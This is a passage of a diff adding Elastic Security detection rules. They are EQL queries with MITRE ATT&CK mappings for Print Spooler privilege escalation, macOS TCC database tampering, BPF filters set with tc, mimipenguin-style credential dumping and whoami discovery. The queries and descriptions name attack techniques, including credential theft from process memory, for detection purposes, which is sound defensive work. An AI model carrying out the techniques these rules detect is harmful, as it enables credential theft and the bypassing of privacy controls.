null\n", + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "edfd5ca9-9d6c-44d9-b615-1e56b920219c", + "setup": "## Setup\n\nThis rule requires data coming in from Filebeat.\n\n### Filebeat Setup\nFilebeat is a lightweight shipper for forwarding and centralizing log data. Installed as an agent on your servers, Filebeat monitors the log files or locations that you specify, collects log events, and forwards them either to Elasticsearch or Logstash for indexing.\n\n#### The following steps should be executed in order to add the Filebeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setup-repositories.html).\n- To run Filebeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-docker.html).\n- To run Filebeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-kubernetes.html).\n- For quick start information for Filebeat refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/8.11/filebeat-installation-configuration.html).\n- For complete \u201cSetup and Run Filebeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setting-up-and-running.html).\n\n#### Rule Specific Setup Note\n- This rule requires the \u201cFilebeat System Module\u201d to be enabled.\n- The system module collects and parses logs created by the system logging service of common Unix/Linux based distributions.\n- To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1136", + "name": "Create Account", + "reference": "https://attack.mitre.org/techniques/T1136/", + "subtechnique": [ + { + "id": "T1136.001", + "name": "Local Account", + "reference": "https://attack.mitre.org/techniques/T1136/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 4 + }, + "id": "edfd5ca9-9d6c-44d9-b615-1e56b920219c_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_107.json b/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_107.json new file mode 100644 index 00000000000..a7a85cab5af --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_107.json @@ -0,0 +1,115 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects unusual Print Spooler service (spoolsv.exe) child processes. This may indicate an attempt to exploit privilege escalation vulnerabilities related to the Printing Service on Windows.", + "false_positives": [ + "Install or update of a legitimate printing driver. Verify the printer driver file metadata such as manufacturer and signature information." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Print Spooler Child Process", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"spoolsv.exe\" and process.command_line != null and \n (?process.Ext.token.integrity_level_name : \"System\" or ?winlog.event_data.IntegrityLevel : \"System\") and\n\n /* exclusions for FP control below */\n not process.name : (\"splwow64.exe\", \"PDFCreator.exe\", \"acrodist.exe\", \"spoolsv.exe\", \"msiexec.exe\", \"route.exe\", \"WerFault.exe\") and\n not process.command_line : \"*\\\\WINDOWS\\\\system32\\\\spool\\\\DRIVERS*\" and\n not (process.name : \"net.exe\" and process.command_line : (\"*stop*\", \"*start*\")) and\n not (process.name : (\"cmd.exe\", \"powershell.exe\") and process.command_line : (\"*.spl*\", \"*\\\\program files*\", \"*route add*\")) and\n not (process.name : \"netsh.exe\" and process.command_line : (\"*add portopening*\", \"*rule name*\")) and\n not (process.name : \"regsvr32.exe\" and process.command_line : \"*PrintConfig.dll*\") and\n not process.executable : (\n \"?:\\\\Program Files (x86)\\\\CutePDF Writer\\\\CPWriter2.exe\",\n \"?:\\\\Program Files (x86)\\\\GPLGS\\\\gswin32c.exe\"\n )\n", + "references": [ + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.token.integrity_level_name", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.IntegrityLevel", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ee5300a7-7e31-4a72-a258-250abb8b3aa1", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Use Case: Vulnerability", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "ee5300a7-7e31-4a72-a258-250abb8b3aa1_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_108.json b/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_108.json new file mode 100644 index 00000000000..36b49fd9276 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_108.json @@ -0,0 +1,115 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects unusual Print Spooler service (spoolsv.exe) child processes. This may indicate an attempt to exploit privilege escalation vulnerabilities related to the Printing Service on Windows.", + "false_positives": [ + "Install or update of a legitimate printing driver. Verify the printer driver file metadata such as manufacturer and signature information." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Print Spooler Child Process", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"spoolsv.exe\" and process.command_line != null and \n (?process.Ext.token.integrity_level_name : \"System\" or ?winlog.event_data.IntegrityLevel : \"System\") and\n\n /* exclusions for FP control below */\n not process.name : (\"splwow64.exe\", \"PDFCreator.exe\", \"acrodist.exe\", \"spoolsv.exe\", \"msiexec.exe\", \"route.exe\", \"WerFault.exe\") and\n not process.command_line : \"*\\\\WINDOWS\\\\system32\\\\spool\\\\DRIVERS*\" and\n not (process.name : \"net.exe\" and process.command_line : (\"*stop*\", \"*start*\")) and\n not (process.name : (\"cmd.exe\", \"powershell.exe\") and process.command_line : (\"*.spl*\", \"*\\\\program files*\", \"*route add*\")) and\n not (process.name : \"netsh.exe\" and process.command_line : (\"*add portopening*\", \"*rule name*\")) and\n not (process.name : \"regsvr32.exe\" and process.command_line : \"*PrintConfig.dll*\") and\n not process.executable : (\n \"?:\\\\Program Files (x86)\\\\CutePDF Writer\\\\CPWriter2.exe\",\n \"?:\\\\Program Files (x86)\\\\GPLGS\\\\gswin32c.exe\"\n )\n", + "references": [ + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.token.integrity_level_name", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.IntegrityLevel", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ee5300a7-7e31-4a72-a258-250abb8b3aa1", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Use Case: Vulnerability", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "ee5300a7-7e31-4a72-a258-250abb8b3aa1_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_107.json b/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_107.json new file mode 100644 index 00000000000..b1bbd8e9858 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_107.json @@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of sqlite3 to directly modify the Transparency, Consent, and Control (TCC) SQLite database. This may indicate an attempt to bypass macOS privacy controls, including access to sensitive resources like the system camera, microphone, address book, and calendar.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Privacy Control Bypass via TCCDB Modification", + "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and process.name : \"sqlite*\" and\n process.args : \"/*/Application Support/com.apple.TCC/TCC.db\" and\n not process.parent.executable : \"/Library/Bitdefender/AVP/product/bin/*\"\n", + "references": [ + "https://applehelpwriter.com/2016/08/29/discovering-how-dropbox-hacks-your-mac/", + "https://github.com/bp88/JSS-Scripts/blob/master/TCC.db%20Modifier.sh", + "https://medium.com/@mattshockl/cve-2020-9934-bypassing-the-os-x-transparency-consent-and-control-tcc-framework-for-4e14806f1de8" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "eea82229-b002-470e-a9e1-00be38b14d32", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "eea82229-b002-470e-a9e1-00be38b14d32_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_108.json b/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_108.json new file mode 100644 index 00000000000..7f6068a4797 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_108.json @@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when the tc (transmission control) binary is utilized to set a BPF (Berkeley Packet Filter) on a network interface. Tc is used to configure Traffic Control in the Linux kernel. It can shape, schedule, police and drop traffic. A threat actor can utilize tc to set a bpf filter on an interface for the purpose of manipulating the incoming traffic. This technique is not at all common and should indicate abnormal, suspicious or malicious activity.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "BPF filter applied using TC", + "query": "process where host.os.type == \"linux\" and event.type != \"end\" and process.executable == \"/usr/sbin/tc\" and\nprocess.args == \"filter\" and process.args == \"add\" and process.args == \"bpf\" and\nnot process.parent.executable == \"/usr/sbin/libvirtd\"\n", + "references": [ + "https://github.com/h3xduck/TripleCross/blob/master/src/helpers/deployer.sh", + "https://man7.org/linux/man-pages/man8/tc.8.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "ef04a476-07ec-48fc-8f3d-5e1742de76d3", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Threat: TripleCross", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "ef04a476-07ec-48fc-8f3d-5e1742de76d3_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_6.json b/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_6.json new file mode 100644 index 00000000000..199c2b25cf8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_6.json @@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of the mimipenguin exploit script which is linux adaptation of Windows tool mimikatz. Mimipenguin exploit script is used to dump clear text passwords from a currently logged-in user. The tool exploits a known vulnerability CVE-2018-20781. Malicious actors can exploit the cleartext credentials in memory by dumping the process and extracting lines that have a high probability of containing cleartext passwords.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Linux Credential Dumping via Proc Filesystem", + "query": "sequence by host.id, process.parent.name with maxspan=1m\n [process where host.os.type == \"linux\" and process.name == \"ps\" and event.action == \"exec\"\n and process.args in (\"-eo\", \"pid\", \"command\")]\n [process where host.os.type == \"linux\" and process.name == \"strings\" and event.action == \"exec\"\n and process.args : \"/tmp/*\"]\n", + "references": [ + "https://github.com/huntergregal/mimipenguin", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ef100a2e-ecd4-4f72-9d1e-2f779ff3c311", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Use Case: Vulnerability", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.007", + "name": "Proc Filesystem", + "reference": "https://attack.mitre.org/techniques/T1003/007/" + } + ] + }, + { + "id": "T1212", + "name": "Exploitation for Credential Access", + "reference": "https://attack.mitre.org/techniques/T1212/" + } + ] + } + ], + "type": "eql", + "version": 6 + }, + "id": "ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_7.json b/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_7.json new file mode 100644 index 00000000000..5baa3c29fdb --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_7.json @@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of the mimipenguin exploit script which is linux adaptation of Windows tool mimikatz. Mimipenguin exploit script is used to dump clear text passwords from a currently logged-in user. The tool exploits a known vulnerability CVE-2018-20781. Malicious actors can exploit the cleartext credentials in memory by dumping the process and extracting lines that have a high probability of containing cleartext passwords.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Linux Credential Dumping via Proc Filesystem", + "query": "sequence by host.id, process.parent.name with maxspan=1m\n [process where host.os.type == \"linux\" and process.name == \"ps\" and event.action == \"exec\"\n and process.args in (\"-eo\", \"pid\", \"command\")]\n [process where host.os.type == \"linux\" and process.name == \"strings\" and event.action == \"exec\"\n and process.args : \"/tmp/*\"]\n", + "references": [ + "https://github.com/huntergregal/mimipenguin", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ef100a2e-ecd4-4f72-9d1e-2f779ff3c311", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Use Case: Vulnerability", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.007", + "name": "Proc Filesystem", + "reference": "https://attack.mitre.org/techniques/T1003/007/" + } + ] + }, + { + "id": "T1212", + "name": "Exploitation for Credential Access", + "reference": "https://attack.mitre.org/techniques/T1212/" + } + ] + } + ], + "type": "eql", + "version": 7 + }, + "id": "ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_110.json b/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_110.json new file mode 100644 index 00000000000..de92b4dcb52 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_110.json @@ -0,0 +1,120 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious use of whoami.exe which displays user, group, and privileges information for the user who is currently logged on to the local system.", + "false_positives": [ + "Some normal use of this program, at varying levels of frequency, may originate from scripts, automation tools and frameworks. Usage by non-engineers and ordinary users is unusual." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "logs-system.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Whoami Process Activity", + "note": "## Triage and analysis\n\n### Investigating Whoami Process Activity\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the execution of the `whoami` utility. Attackers commonly use this utility to measure their current privileges, discover the current user, determine if a privilege escalation was successful, etc.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Related rules\n\n- Account Discovery Command via SYSTEM Account - 